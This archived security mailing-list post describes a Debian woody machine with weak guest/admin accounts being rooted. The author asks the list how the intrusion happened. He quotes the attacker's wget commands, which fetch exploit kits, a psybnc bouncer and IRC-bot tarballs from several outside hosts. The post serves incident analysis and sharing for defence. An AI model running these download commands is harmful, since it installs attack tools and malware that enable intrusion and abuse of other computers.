lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <1093473139.4414.11.camel@lap.richard> From: holle at ackw.de (Richard Verwayen) Subject: Automated ssh scanning Hello list! A few weeks ago there was a discussion about automated ssh scanning with user/password combinations like guest/guest or admin/admin. I set up a debian woody fully patched with both accounts activated, and got rooted some days later... The attackers installed some software and irc-bots and tried to use this host for testing other computers, thats not the point. I would like to know where's the weak point in the system? As the system was updates on a daily base! The only known weakness were these two accounts! Here is a list of software the attacker used, maybe someone could bring a bit light into this tunnel! wget sky.prohosting.com/awxro/linux/xpl.tar.gz wget www.bo2k-rulez.net/a wget www.bo2k-rulez.net/psybnc.tgz wget www.corbeanu.as.ro/t.gz wget roarmy.com/god.tgz wget www.generatiapro.go.ro/fast.tgz Richard
Powered by blists - more mailing lists